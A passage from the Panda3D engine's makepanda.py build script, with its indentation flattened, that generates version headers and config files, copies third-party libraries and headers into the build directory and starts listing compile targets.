ConditionalWriteFile(GetOutputDir() + '/include/p3d_plugin_config.h', conf)
if (PkgSkip("SPEEDTREE")==0):
conf = "/* speedtree_parameters.h. Generated automatically by makepanda.py */\n"
for key in sorted(speedtree_parameters.keys()):
val = OverrideValue(key, speedtree_parameters[key])
if (val == 'UNDEF'): conf = conf + "#undef " + key + "\n"
else: conf = conf + "#define " + key + " \"" + val.replace("\\", "\\\\") + "\"\n"
ConditionalWriteFile(GetOutputDir() + '/include/speedtree_parameters.h', conf)
for x in PkgListGet():
if (PkgSkip(x)): ConditionalWriteFile(GetOutputDir() + '/tmp/dtool_have_'+x.lower()+'.dat', "0\n")
else: ConditionalWriteFile(GetOutputDir() + '/tmp/dtool_have_'+x.lower()+'.dat', "1\n")
WriteConfigSettings()
WarnConflictingFiles()
if SystemLibraryExists("dtoolbase"):
print("%sWARNING:%s Found conflicting Panda3D libraries from other ppremake build!" % (GetColor("red"), GetColor()))
if SystemLibraryExists("p3dtoolconfig"):
print("%sWARNING:%s Found conflicting Panda3D libraries from other makepanda build!" % (GetColor("red"), GetColor()))
##########################################################################################
#
# Generate pandaVersion.h, pythonversion, null.cxx, etc.
#
##########################################################################################
PANDAVERSION_H="""
#define PANDA_MAJOR_VERSION $VERSION1
#define PANDA_MINOR_VERSION $VERSION2
#define PANDA_SEQUENCE_VERSION $VERSION3
#define PANDA_VERSION $NVERSION
#define PANDA_NUMERIC_VERSION $NVERSION
#define PANDA_VERSION_STR "$VERSION1.$VERSION2.$VERSION3"
#define PANDA_ABI_VERSION_STR "$VERSION1.$VERSION2"
#define PANDA_DISTRIBUTOR "$DISTRIBUTOR"
#define PANDA_PACKAGE_VERSION_STR "$RTDIST_VERSION"
#define PANDA_PACKAGE_HOST_URL "$HOST_URL"
"""
PANDAVERSION_H_RUNTIME="""
#define PANDA_MAJOR_VERSION 0
#define PANDA_MINOR_VERSION 0
#define PANDA_SEQUENCE_VERSION 0
#define PANDA_VERSION_STR "0.0.0"
#define PANDA_ABI_VERSION_STR "0.0"
#define P3D_PLUGIN_MAJOR_VERSION $VERSION1
#define P3D_PLUGIN_MINOR_VERSION $VERSION2
#define P3D_PLUGIN_SEQUENCE_VERSION $VERSION3
#define P3D_PLUGIN_VERSION_STR "$VERSION1.$VERSION2.$VERSION3"
#define P3D_COREAPI_VERSION_STR "$COREAPI_VERSION"
#define PANDA_DISTRIBUTOR "$DISTRIBUTOR"
#define PANDA_PACKAGE_VERSION_STR ""
#define PANDA_PACKAGE_HOST_URL "$HOST_URL"
"""
CHECKPANDAVERSION_CXX="""
# include "dtoolbase.h"
EXPCL_DTOOL_DTOOLUTIL int panda_version_$VERSION1_$VERSION2 = 0;
"""
CHECKPANDAVERSION_H="""
# include "dtoolbase.h"
extern EXPCL_DTOOL_DTOOLUTIL int panda_version_$VERSION1_$VERSION2;
# ifndef WIN32
/* For Windows, exporting the symbol from the DLL is sufficient; the
DLL will not load unless all expected public symbols are defined.
Other systems may not mind if the symbol is absent unless we
explictly write code that references it. */
static int check_panda_version = panda_version_$VERSION1_$VERSION2;
# endif
"""
P3DACTIVEX_RC="""#include "resource.h"
#define APSTUDIO_READONLY_SYMBOLS
#include "afxres.h"
#undef APSTUDIO_READONLY_SYMBOLS
#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
#ifdef _WIN32
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
#pragma code_page(1252)
#endif
#ifdef APSTUDIO_INVOKED
1 TEXTINCLUDE
BEGIN
"resource.h\\0"
END
2 TEXTINCLUDE
BEGIN
"#include ""afxres.h""\\r\\n"
"\\0"
END
3 TEXTINCLUDE
BEGIN
"1 TYPELIB ""P3DActiveX.tlb""\\r\\n"
"\\0"
END
#endif
%s
IDB_P3DACTIVEX BITMAP "P3DActiveXCtrl.bmp"
IDD_PROPPAGE_P3DACTIVEX DIALOG 0, 0, 250, 62
STYLE DS_SETFONT | WS_CHILD
FONT 8, "MS Sans Serif"
BEGIN
LTEXT "TODO: Place controls to manipulate properties of P3DActiveX Control on this dialog.",
IDC_STATIC,7,25,229,16
END
#ifdef APSTUDIO_INVOKED
GUIDELINES DESIGNINFO
BEGIN
IDD_PROPPAGE_P3DACTIVEX, DIALOG
BEGIN
LEFTMARGIN, 7
RIGHTMARGIN, 243
TOPMARGIN, 7
BOTTOMMARGIN, 55
END
END
#endif
STRINGTABLE
BEGIN
IDS_P3DACTIVEX "P3DActiveX Control"
IDS_P3DACTIVEX_PPG "P3DActiveX Property Page"
END
STRINGTABLE
BEGIN
IDS_P3DACTIVEX_PPG_CAPTION "General"
END
#endif
#ifndef APSTUDIO_INVOKED
1 TYPELIB "P3DActiveX.tlb"
#endif"""
def CreatePandaVersionFiles():
version1=int(VERSION.split(".")[0])
version2=int(VERSION.split(".")[1])
version3=int(VERSION.split(".")[2])
nversion=version1*1000000+version2*1000+version3
if (DISTRIBUTOR != "cmu"):
# Subtract 1 if we are not an official version.
nversion -= 1
if (RUNTIME):
pandaversion_h = PANDAVERSION_H_RUNTIME
else:
pandaversion_h = PANDAVERSION_H
pandaversion_h = pandaversion_h.replace("$VERSION1",str(version1))
pandaversion_h = pandaversion_h.replace("$VERSION2",str(version2))
pandaversion_h = pandaversion_h.replace("$VERSION3",str(version3))
pandaversion_h = pandaversion_h.replace("$NVERSION",str(nversion))
pandaversion_h = pandaversion_h.replace("$DISTRIBUTOR",DISTRIBUTOR)
pandaversion_h = pandaversion_h.replace("$RTDIST_VERSION",RTDIST_VERSION)
pandaversion_h = pandaversion_h.replace("$COREAPI_VERSION",COREAPI_VERSION)
pandaversion_h = pandaversion_h.replace("$HOST_URL",(HOST_URL or ""))
if (DISTRIBUTOR == "cmu"):
pandaversion_h += "\n#define PANDA_OFFICIAL_VERSION\n"
else:
pandaversion_h += "\n#undef PANDA_OFFICIAL_VERSION\n"
if GIT_COMMIT:
pandaversion_h += "\n#define PANDA_GIT_COMMIT_STR \"%s\"\n" % (GIT_COMMIT)
if not RUNTIME:
checkpandaversion_cxx = CHECKPANDAVERSION_CXX.replace("$VERSION1",str(version1))
checkpandaversion_cxx = checkpandaversion_cxx.replace("$VERSION2",str(version2))
checkpandaversion_cxx = checkpandaversion_cxx.replace("$VERSION3",str(version3))
checkpandaversion_cxx = checkpandaversion_cxx.replace("$NVERSION",str(nversion))
checkpandaversion_h = CHECKPANDAVERSION_H.replace("$VERSION1",str(version1))
checkpandaversion_h = checkpandaversion_h.replace("$VERSION2",str(version2))
checkpandaversion_h = checkpandaversion_h.replace("$VERSION3",str(version3))
checkpandaversion_h = checkpandaversion_h.replace("$NVERSION",str(nversion))
ConditionalWriteFile(GetOutputDir()+'/include/pandaVersion.h', pandaversion_h)
if RUNTIME:
ConditionalWriteFile(GetOutputDir()+'/include/checkPandaVersion.cxx', '')
ConditionalWriteFile(GetOutputDir()+'/include/checkPandaVersion.h', '')
else:
ConditionalWriteFile(GetOutputDir()+'/include/checkPandaVersion.cxx', checkpandaversion_cxx)
ConditionalWriteFile(GetOutputDir()+'/include/checkPandaVersion.h', checkpandaversion_h)
ConditionalWriteFile(GetOutputDir()+"/tmp/null.cxx","")
if RUNTIME:
p3dactivex_rc = {"name" : "Panda3D Game Engine Plug-in",
"version" : VERSION,
"description" : "Runs 3-D games and interactive applets",
"filename" : "p3dactivex.ocx",
"mimetype" : "application/x-panda3d",
"extension" : "p3d",
"filedesc" : "Panda3D applet"}
ConditionalWriteFile(GetOutputDir()+"/include/P3DActiveX.rc", P3DACTIVEX_RC % GenerateResourceFile(**p3dactivex_rc))
CreatePandaVersionFiles()
##########################################################################################
#
# Copy the "direct" tree
#
##########################################################################################
if (PkgSkip("DIRECT")==0):
CopyPythonTree(GetOutputDir() + '/direct', 'direct/src', threads=THREADCOUNT)
ConditionalWriteFile(GetOutputDir() + '/direct/__init__.py', "")
# This file used to be copied, but would nowadays cause conflicts.
# Let's get it out of the way in case someone hasn't cleaned their build since.
if os.path.isfile(GetOutputDir() + '/bin/panda3d.py'):
os.remove(GetOutputDir() + '/bin/panda3d.py')
if os.path.isfile(GetOutputDir() + '/lib/panda3d.py'):
os.remove(GetOutputDir() + '/lib/panda3d.py')
# This directory doesn't exist at all any more.
if os.path.isdir(os.path.join(GetOutputDir(), 'direct', 'ffi')):
shutil.rmtree(os.path.join(GetOutputDir(), 'direct', 'ffi'))
# These files used to exist; remove them to avoid conflicts.
del_files = ['core.py', 'core.pyc', 'core.pyo',
'_core.pyd', '_core.so',
'direct.py', 'direct.pyc', 'direct.pyo',
'_direct.pyd', '_direct.so',
'dtoolconfig.pyd', 'dtoolconfig.so']
for basename in del_files:
path = os.path.join(GetOutputDir(), 'panda3d', basename)
if os.path.isfile(path):
print("Removing %s" % (path))
os.remove(path)
# Write an appropriate panda3d/__init__.py
p3d_init = """"Python bindings for the Panda3D libraries"
__version__ = '%s'
""" % (WHLVERSION)
if GetTarget() == 'windows':
p3d_init += """
import os
bindir = os.path.join(os.path.dirname(__file__), '..', 'bin')
if os.path.isdir(bindir):
if not os.environ.get('PATH'):
os.environ['PATH'] = bindir
else:
os.environ['PATH'] = bindir + os.pathsep + os.environ['PATH']
del os, bindir
"""
if not PkgSkip("PYTHON"):
ConditionalWriteFile(GetOutputDir() + '/panda3d/__init__.py', p3d_init)
# Also add this file, for backward compatibility.
ConditionalWriteFile(GetOutputDir() + '/panda3d/dtoolconfig.py', """
if __debug__:
print("Warning: panda3d.dtoolconfig is deprecated, use panda3d.interrogatedb instead.")
from .interrogatedb import *
""")
# PandaModules is now deprecated; generate a shim for backward compatibility.
for fn in glob.glob(GetOutputDir() + '/pandac/*.py') + glob.glob(GetOutputDir() + '/pandac/*.py[co]'):
if os.path.basename(fn) not in ('PandaModules.py', '__init__.py'):
os.remove(fn)
panda_modules = ['core']
if not PkgSkip("PANDAPHYSICS"):
panda_modules.append('physics')
if not PkgSkip('PANDAFX'):
panda_modules.append('fx')
if not PkgSkip("DIRECT"):
panda_modules.append('direct')
if not PkgSkip("VISION"):
panda_modules.append('vision')
if not PkgSkip("SKEL"):
panda_modules.append('skel')
if not PkgSkip("EGG"):
panda_modules.append('egg')
if not PkgSkip("AWESOMIUM"):
panda_modules.append('awesomium')
if not PkgSkip("ODE"):
panda_modules.append('ode')
if not PkgSkip("VRPN"):
panda_modules.append('vrpn')
panda_modules_code = """
"This module is deprecated. Import from panda3d.core and other panda3d.* modules instead."
if __debug__:
print("Warning: pandac.PandaModules is deprecated, import from panda3d.core instead")
"""
for module in panda_modules:
panda_modules_code += """
try:
from panda3d.%s import *
except ImportError as err:
if "No module named %s" not in str(err):
raise""" % (module, module)
exthelpers_code = """
"This module is deprecated. Import from direct.extensions_native.extension_native_helpers instead."
from direct.extensions_native.extension_native_helpers import *
"""
if not PkgSkip("PYTHON"):
ConditionalWriteFile(GetOutputDir() + '/pandac/PandaModules.py', panda_modules_code)
ConditionalWriteFile(GetOutputDir() + '/pandac/extension_native_helpers.py', exthelpers_code)
ConditionalWriteFile(GetOutputDir() + '/pandac/__init__.py', '')
##########################################################################################
#
# Generate the PRC files into the ETC directory.
#
##########################################################################################
confautoprc = ReadFile("makepanda/confauto.in")
if (PkgSkip("SPEEDTREE")==0):
# If SpeedTree is available, enable it in the config file
confautoprc = confautoprc.replace('#st#', '')
else:
# otherwise, disable it.
confautoprc = confautoprc.replace('#st#', '#')
if (os.path.isfile("makepanda/myconfig.in")):
configprc = ReadFile("makepanda/myconfig.in")
else:
configprc = ReadFile("makepanda/config.in")
if (GetTarget() == 'windows'):
configprc = configprc.replace("$XDG_CACHE_HOME/panda3d", "$USER_APPDATA/Panda3D-%s" % MAJOR_VERSION)
else:
configprc = configprc.replace("aux-display pandadx9", "")
if (GetTarget() == 'darwin'):
configprc = configprc.replace("$XDG_CACHE_HOME/panda3d", "Library/Caches/Panda3D-%s" % MAJOR_VERSION)
# OpenAL is not yet working well on OSX for us, so let's do this for now.
configprc = configprc.replace("p3openal_audio", "p3fmod_audio")
if GetTarget() == 'windows':
# Convert to Windows newlines.
ConditionalWriteFile(GetOutputDir()+"/etc/Config.prc", configprc, newline='\r\n')
ConditionalWriteFile(GetOutputDir()+"/etc/Confauto.prc", confautoprc, newline='\r\n')
else:
ConditionalWriteFile(GetOutputDir()+"/etc/Config.prc", configprc)
ConditionalWriteFile(GetOutputDir()+"/etc/Confauto.prc", confautoprc)
##########################################################################################
#
# Copy the precompiled binaries and DLLs into the build.
#
##########################################################################################
tp_dir = GetThirdpartyDir()
if tp_dir is not None:
dylibs = {}
if GetTarget() == 'darwin':
# Make a list of all the dylibs we ship, to figure out whether we should use
# install_name_tool to correct the library reference to point to our copy.
for lib in glob.glob(tp_dir + "/*/lib/*.dylib"):
dylibs[os.path.basename(lib)] = os.path.basename(os.path.realpath(lib))
if not PkgSkip("PYTHON"):
for lib in glob.glob(tp_dir + "/*/lib/" + SDK["PYTHONVERSION"] + "/*.dylib"):
dylibs[os.path.basename(lib)] = os.path.basename(os.path.realpath(lib))
for pkg in PkgListGet():
if PkgSkip(pkg):
continue
tp_pkg = tp_dir + pkg.lower()
if GetTarget() == 'windows':
if os.path.exists(tp_pkg + "/bin"):
CopyAllFiles(GetOutputDir() + "/bin/", tp_pkg + "/bin/")
if (PkgSkip("PYTHON")==0 and os.path.exists(tp_pkg + "/bin/" + SDK["PYTHONVERSION"])):
CopyAllFiles(GetOutputDir() + "/bin/", tp_pkg + "/bin/" + SDK["PYTHONVERSION"] + "/")
elif GetTarget() == 'darwin':
tp_libs = glob.glob(tp_pkg + "/lib/*.dylib")
if not PkgSkip("PYTHON"):
tp_libs += glob.glob(os.path.join(tp_pkg, "lib", SDK["PYTHONVERSION"], "*.dylib"))
tp_libs += glob.glob(os.path.join(tp_pkg, "lib", SDK["PYTHONVERSION"], "*.so"))
if pkg != 'PYTHON':
tp_libs += glob.glob(os.path.join(tp_pkg, "lib", SDK["PYTHONVERSION"], "*.py"))
for tp_lib in tp_libs:
basename = os.path.basename(tp_lib)
if basename.endswith('.dylib'):
# It's a dynamic link library. Put it in the lib directory.
target = GetOutputDir() + "/lib/" + basename
dep_prefix = "@loader_path/../lib/"
lib_id = dep_prefix + basename
else:
# It's a Python module, like _rocketcore.so. Copy it to the root, because
# nowadays the 'lib' directory may no longer be on the PYTHONPATH.
target = GetOutputDir() + "/" + basename
dep_prefix = "@loader_path/lib/"
lib_id = basename
if not NeedsBuild([target], [tp_lib]):
continue
CopyFile(target, tp_lib)
if os.path.islink(target) or target.endswith('.py'):
continue
# Correct the inter-library dependencies so that the build is relocatable.
oscmd('install_name_tool -id %s %s' % (lib_id, target))
oscmd("otool -L %s | grep .dylib > %s/tmp/otool-libs.txt" % (target, GetOutputDir()), True)
for line in open(GetOutputDir() + "/tmp/otool-libs.txt", "r"):
line = line.strip()
if not line or line.startswith(dep_prefix) or line.endswith(":"):
continue
libdep = line.split(" ", 1)[0]
dep_basename = os.path.basename(libdep)
if dep_basename in dylibs:
dep_target = dylibs[dep_basename]
oscmd("install_name_tool -change %s %s%s %s" % (libdep, dep_prefix, dep_target, target), True)
JustBuilt([target], [tp_lib])
for fwx in glob.glob(tp_pkg + "/*.framework"):
CopyTree(GetOutputDir() + "/Frameworks/" + os.path.basename(fwx), fwx)
else: # Linux / FreeBSD case.
for tp_lib in glob.glob(tp_pkg + "/lib/*.so*"):
CopyFile(GetOutputDir() + "/lib/" + os.path.basename(tp_lib), tp_lib)
if not PkgSkip("PYTHON"):
for tp_lib in glob.glob(os.path.join(tp_pkg, "lib", SDK["PYTHONVERSION"], "*.so*")):
base = os.path.basename(tp_lib)
if base.startswith('lib'):
CopyFile(GetOutputDir() + "/lib/" + base, tp_lib)
else:
# It's a Python module, like _rocketcore.so.
CopyFile(GetOutputDir() + "/" + base, tp_lib)
if GetTarget() == 'windows':
if os.path.isdir(os.path.join(tp_dir, "extras", "bin")):
CopyAllFiles(GetOutputDir() + "/bin/", tp_dir + "extras/bin/")
if not PkgSkip("PYTHON") and not RTDIST:
# We need to copy the Python DLL to the bin directory for now.
pydll = "/" + SDK["PYTHONVERSION"].replace(".", "")
if GetOptimize() <= 2:
pydll += "_d.dll"
else:
pydll += ".dll"
CopyFile(GetOutputDir() + "/bin" + pydll, SDK["PYTHON"] + pydll)
for fn in glob.glob(SDK["PYTHON"] + "/vcruntime*.dll"):
CopyFile(GetOutputDir() + "/bin/", fn)
# Copy the whole Python directory.
CopyTree(GetOutputDir() + "/python", SDK["PYTHON"])
# NB: Python does not always ship with the correct manifest/dll.
# Figure out the correct one to ship, and grab it from WinSxS dir.
manifest = GetOutputDir() + '/tmp/python.manifest'
if os.path.isfile(manifest):
os.unlink(manifest)
oscmd('mt -inputresource:"%s\\python.exe";#1 -out:"%s" -nologo' % (SDK["PYTHON"], manifest), True)
if os.path.isfile(manifest):
import xml.etree.ElementTree as ET
tree = ET.parse(manifest)
idents = tree.findall('./{urn:schemas-microsoft-com:asm.v1}dependency/{urn:schemas-microsoft-com:asm.v1}dependentAssembly/{urn:schemas-microsoft-com:asm.v1}assemblyIdentity')
else:
idents = ()
for ident in idents:
sxs_name = '_'.join([
ident.get('processorArchitecture'),
ident.get('name').lower(),
ident.get('publicKeyToken'),
ident.get('version'),
])
# Find the manifest matching these parameters.
pattern = os.path.join('C:' + os.sep, 'Windows', 'WinSxS', 'Manifests', sxs_name + '_*.manifest')
manifests = glob.glob(pattern)
if not manifests:
print("%sWARNING:%s Could not locate manifest %s. You may need to reinstall the Visual C++ Redistributable." % (GetColor("red"), GetColor(), pattern))
continue
CopyFile(GetOutputDir() + "/python/" + ident.get('name') + ".manifest", manifests[0])
# Also copy the corresponding msvcr dll.
pattern = os.path.join('C:' + os.sep, 'Windows', 'WinSxS', sxs_name + '_*', 'msvcr*.dll')
for file in glob.glob(pattern):
CopyFile(GetOutputDir() + "/python/", file)
# Copy python.exe to ppython.exe.
if not os.path.isfile(SDK["PYTHON"] + "/ppython.exe") and os.path.isfile(SDK["PYTHON"] + "/python.exe"):
CopyFile(GetOutputDir() + "/python/ppython.exe", SDK["PYTHON"] + "/python.exe")
if not os.path.isfile(SDK["PYTHON"] + "/ppythonw.exe") and os.path.isfile(SDK["PYTHON"] + "/pythonw.exe"):
CopyFile(GetOutputDir() + "/python/ppythonw.exe", SDK["PYTHON"] + "/pythonw.exe")
ConditionalWriteFile(GetOutputDir() + "/python/panda.pth", "..\n../bin\n")
# Copy over the MSVC runtime.
if GetTarget() == 'windows' and "VISUALSTUDIO" in SDK:
vsver = "%s%s" % SDK["VISUALSTUDIO_VERSION"]
vcver = "%s%s" % (SDK["MSVC_VERSION"][0], 0) # ignore minor version.
crtname = "Microsoft.VC%s.CRT" % (vsver)
if ("VCTOOLSVERSION" in SDK):
dir = os.path.join(SDK["VISUALSTUDIO"], "VC", "Redist", "MSVC", SDK["VCTOOLSVERSION"], "onecore", GetTargetArch(), crtname)
else:
dir = os.path.join(SDK["VISUALSTUDIO"], "VC", "redist", GetTargetArch(), crtname)
if os.path.isfile(os.path.join(dir, "msvcr" + vcver + ".dll")):
CopyFile(GetOutputDir() + "/bin/", os.path.join(dir, "msvcr" + vcver + ".dll"))
if os.path.isfile(os.path.join(dir, "msvcp" + vcver + ".dll")):
CopyFile(GetOutputDir() + "/bin/", os.path.join(dir, "msvcp" + vcver + ".dll"))
if os.path.isfile(os.path.join(dir, "vcruntime" + vcver + ".dll")):
CopyFile(GetOutputDir() + "/bin/", os.path.join(dir, "vcruntime" + vcver + ".dll"))
########################################################################
##
## Copy various stuff into the build.
##
########################################################################
if GetTarget() == 'windows':
# Convert to Windows newlines so they can be opened by notepad.
WriteFile(GetOutputDir() + "/LICENSE", ReadFile("doc/LICENSE"), newline='\r\n')
WriteFile(GetOutputDir() + "/ReleaseNotes", ReadFile("doc/ReleaseNotes"), newline='\r\n')
CopyFile(GetOutputDir() + "/pandaIcon.ico", "panda/src/configfiles/pandaIcon.ico")
else:
CopyFile(GetOutputDir()+"/", "doc/LICENSE")
CopyFile(GetOutputDir()+"/", "doc/ReleaseNotes")
if (PkgSkip("PANDATOOL")==0):
CopyAllFiles(GetOutputDir()+"/plugins/", "pandatool/src/scripts/", ".mel")
CopyAllFiles(GetOutputDir()+"/plugins/", "pandatool/src/scripts/", ".ms")
if (PkgSkip("PYTHON")==0 and os.path.isdir(GetThirdpartyBase()+"/Pmw")):
CopyTree(GetOutputDir()+'/Pmw', GetThirdpartyBase()+'/Pmw')
ConditionalWriteFile(GetOutputDir()+'/include/ctl3d.h', '/* dummy file to make MAX happy */')
# Since Eigen is included by all sorts of core headers, as a convenience
# to C++ users on Win and Mac, we include it in the Panda include directory.
if not PkgSkip("EIGEN") and GetTarget() in ("windows", "darwin") and GetThirdpartyDir():
CopyTree(GetOutputDir()+'/include/Eigen', GetThirdpartyDir()+'eigen/include/Eigen')
########################################################################
#
# Copy header files to the built/include/parser-inc directory.
#
########################################################################
CopyTree(GetOutputDir()+'/include/parser-inc','dtool/src/parser-inc')
DeleteVCS(GetOutputDir()+'/include/parser-inc')
########################################################################
#
# Transfer all header files to the built/include directory.
#
########################################################################
CopyAllHeaders('dtool/src/dtoolbase')
CopyAllHeaders('dtool/src/dtoolutil', skip=["pandaVersion.h", "checkPandaVersion.h"])
CopyFile(GetOutputDir()+'/include/','dtool/src/dtoolutil/vector_src.cxx')
CopyAllHeaders('dtool/metalibs/dtool')
CopyAllHeaders('dtool/src/cppparser')
CopyAllHeaders('dtool/src/prc', skip=["prc_parameters.h"])
CopyAllHeaders('dtool/src/dconfig')
CopyAllHeaders('dtool/src/interrogatedb')
CopyAllHeaders('dtool/metalibs/dtoolconfig')
CopyAllHeaders('dtool/src/pystub')
CopyAllHeaders('dtool/src/interrogate')
CopyAllHeaders('dtool/src/test_interrogate')
CopyAllHeaders('panda/src/putil')
CopyAllHeaders('panda/src/pandabase')
CopyAllHeaders('panda/src/express')
CopyAllHeaders('panda/src/downloader')
CopyAllHeaders('panda/metalibs/pandaexpress')
CopyAllHeaders('panda/src/pipeline')
CopyAllHeaders('panda/src/linmath')
CopyAllHeaders('panda/src/putil')
CopyAllHeaders('dtool/src/prckeys')
CopyAllHeaders('panda/src/audio')
CopyAllHeaders('panda/src/event')
CopyAllHeaders('panda/src/mathutil')
CopyAllHeaders('panda/src/gsgbase')
CopyAllHeaders('panda/src/pnmimage')
CopyAllHeaders('panda/src/nativenet')
CopyAllHeaders('panda/src/net')
CopyAllHeaders('panda/src/pstatclient')
CopyAllHeaders('panda/src/gobj')
CopyAllHeaders('panda/src/movies')
CopyAllHeaders('panda/src/pgraphnodes')
CopyAllHeaders('panda/src/pgraph')
CopyAllHeaders('panda/src/cull')
CopyAllHeaders('panda/src/chan')
CopyAllHeaders('panda/src/char')
CopyAllHeaders('panda/src/dgraph')
CopyAllHeaders('panda/src/display')
CopyAllHeaders('panda/src/device')
CopyAllHeaders('panda/src/pnmtext')
CopyAllHeaders('panda/src/text')
CopyAllHeaders('panda/src/grutil')
if (PkgSkip("VISION")==0):
CopyAllHeaders('panda/src/vision')
CopyAllHeaders('panda/src/awesomium')
if (PkgSkip("FFMPEG")==0):
CopyAllHeaders('panda/src/ffmpeg')
CopyAllHeaders('panda/src/tform')
CopyAllHeaders('panda/src/collide')
CopyAllHeaders('panda/src/parametrics')
CopyAllHeaders('panda/src/pgui')
CopyAllHeaders('panda/src/pnmimagetypes')
CopyAllHeaders('panda/src/recorder')
if (PkgSkip("ROCKET")==0):
CopyAllHeaders('panda/src/rocket')
if (PkgSkip("VRPN")==0):
CopyAllHeaders('panda/src/vrpn')
CopyAllHeaders('panda/src/wgldisplay')
CopyAllHeaders('panda/src/ode')
CopyAllHeaders('panda/metalibs/pandaode')
if (PkgSkip("PANDAPHYSICS")==0):
CopyAllHeaders('panda/src/physics')
if (PkgSkip("PANDAPARTICLESYSTEM")==0):
CopyAllHeaders('panda/src/particlesystem')
CopyAllHeaders('panda/src/dxml')
CopyAllHeaders('panda/metalibs/panda')
CopyAllHeaders('panda/src/audiotraits')
CopyAllHeaders('panda/src/audiotraits')
CopyAllHeaders('panda/src/distort')
CopyAllHeaders('panda/src/downloadertools')
CopyAllHeaders('panda/src/windisplay')
CopyAllHeaders('panda/src/dxgsg9')
CopyAllHeaders('panda/metalibs/pandadx9')
if not PkgSkip("EGG"):
CopyAllHeaders('panda/src/egg')
CopyAllHeaders('panda/src/egg2pg')
CopyAllHeaders('panda/src/framework')
CopyAllHeaders('panda/metalibs/pandafx')
CopyAllHeaders('panda/src/glstuff')
CopyAllHeaders('panda/src/glgsg')
CopyAllHeaders('panda/src/glesgsg')
CopyAllHeaders('panda/src/gles2gsg')
if not PkgSkip("EGG"):
CopyAllHeaders('panda/metalibs/pandaegg')
if GetTarget() == 'windows':
CopyAllHeaders('panda/src/wgldisplay')
elif GetTarget() == 'darwin':
CopyAllHeaders('panda/src/osxdisplay')
CopyAllHeaders('panda/src/cocoadisplay')
elif GetTarget() == 'android':
CopyAllHeaders('panda/src/android')
CopyAllHeaders('panda/src/androiddisplay')
else:
CopyAllHeaders('panda/src/x11display')
CopyAllHeaders('panda/src/glxdisplay')
CopyAllHeaders('panda/src/egldisplay')
CopyAllHeaders('panda/metalibs/pandagl')
CopyAllHeaders('panda/metalibs/pandagles')
CopyAllHeaders('panda/metalibs/pandagles2')
CopyAllHeaders('panda/metalibs/pandaphysics')
CopyAllHeaders('panda/src/testbed')
if (PkgSkip("PHYSX")==0):
CopyAllHeaders('panda/src/physx')
CopyAllHeaders('panda/metalibs/pandaphysx')
if (PkgSkip("BULLET")==0):
CopyAllHeaders('panda/src/bullet')
CopyAllHeaders('panda/metalibs/pandabullet')
if (PkgSkip("SPEEDTREE")==0):
CopyAllHeaders('panda/src/speedtree')
if (PkgSkip("DIRECT")==0):
CopyAllHeaders('direct/src/directbase')
CopyAllHeaders('direct/src/dcparser')
CopyAllHeaders('direct/src/deadrec')
CopyAllHeaders('direct/src/distributed')
CopyAllHeaders('direct/src/interval')
CopyAllHeaders('direct/src/showbase')
CopyAllHeaders('direct/src/dcparse')
if (RUNTIME or RTDIST):
CopyAllHeaders('direct/src/plugin', skip=["p3d_plugin_config.h"])
if (RUNTIME):
CopyAllHeaders('direct/src/plugin_npapi')
CopyAllHeaders('direct/src/plugin_standalone')
if (PkgSkip("PANDATOOL")==0):
CopyAllHeaders('pandatool/src/pandatoolbase')
CopyAllHeaders('pandatool/src/converter')
CopyAllHeaders('pandatool/src/progbase')
CopyAllHeaders('pandatool/src/eggbase')
CopyAllHeaders('pandatool/src/bam')
CopyAllHeaders('pandatool/src/cvscopy')
CopyAllHeaders('pandatool/src/daeegg')
CopyAllHeaders('pandatool/src/daeprogs')
CopyAllHeaders('pandatool/src/dxf')
CopyAllHeaders('pandatool/src/dxfegg')
CopyAllHeaders('pandatool/src/dxfprogs')
CopyAllHeaders('pandatool/src/palettizer')
CopyAllHeaders('pandatool/src/egg-mkfont')
CopyAllHeaders('pandatool/src/eggcharbase')
CopyAllHeaders('pandatool/src/egg-optchar')
CopyAllHeaders('pandatool/src/egg-palettize')
CopyAllHeaders('pandatool/src/egg-qtess')
CopyAllHeaders('pandatool/src/eggprogs')
CopyAllHeaders('pandatool/src/flt')
CopyAllHeaders('pandatool/src/fltegg')
CopyAllHeaders('pandatool/src/fltprogs')
CopyAllHeaders('pandatool/src/imagebase')
CopyAllHeaders('pandatool/src/imageprogs')
CopyAllHeaders('pandatool/src/pfmprogs')
CopyAllHeaders('pandatool/src/lwo')
CopyAllHeaders('pandatool/src/lwoegg')
CopyAllHeaders('pandatool/src/lwoprogs')
CopyAllHeaders('pandatool/src/maya')
CopyAllHeaders('pandatool/src/mayaegg')
CopyAllHeaders('pandatool/src/maxegg')
CopyAllHeaders('pandatool/src/maxprogs')
CopyAllHeaders('pandatool/src/objegg')
CopyAllHeaders('pandatool/src/objprogs')
CopyAllHeaders('pandatool/src/vrml')
CopyAllHeaders('pandatool/src/vrmlegg')
CopyAllHeaders('pandatool/src/xfile')
CopyAllHeaders('pandatool/src/xfileegg')
CopyAllHeaders('pandatool/src/ptloader')
CopyAllHeaders('pandatool/src/miscprogs')
CopyAllHeaders('pandatool/src/pstatserver')
CopyAllHeaders('pandatool/src/softprogs')
CopyAllHeaders('pandatool/src/text-stats')
CopyAllHeaders('pandatool/src/vrmlprogs')
CopyAllHeaders('pandatool/src/win-stats')
CopyAllHeaders('pandatool/src/xfileprogs')
if (PkgSkip("CONTRIB")==0):
CopyAllHeaders('contrib/src/contribbase')
CopyAllHeaders('contrib/src/ai')
########################################################################
#
# These definitions are syntactic shorthand. They make it easy
# to link with the usual libraries without listing them all.
#
########################################################################
COMMON_DTOOL_LIBS=[
'libp3dtool.dll',
'libp3dtoolconfig.dll',
]
COMMON_PANDA_LIBS=[
'libpanda.dll',
'libpandaexpress.dll'
] + COMMON_DTOOL_LIBS
COMMON_EGG2X_LIBS=[
'libp3eggbase.lib',
'libp3progbase.lib',
'libp3converter.lib',
'libp3pandatoolbase.lib',
'libpandaegg.dll',
] + COMMON_PANDA_LIBS
########################################################################
#
# This section contains a list of all the files that need to be compiled.
#
########################################################################
print("Generating dependencies...")
sys.stdout.flush()
#
# Compile Panda icon resource file.
# We do it first because we need it at
# the time we compile an executable.
#
if GetTarget() == 'windows':
OPTS=['DIR:panda/src/configfiles']
TargetAdd('pandaIcon.res', opts=OPTS, input='pandaIcon.rc')
#
# DIRECTORY: dtool/src/dtoolbase/
#
OPTS=['DIR:dtool/src/dtoolbase', 'BUILDING:DTOOL']
TargetAdd('p3dtoolbase_composite1.obj', opts=OPTS, input='p3dtoolbase_composite1.cxx')
TargetAdd('p3dtoolbase_composite2.obj', opts=OPTS, input='p3dtoolbase_composite2.cxx')
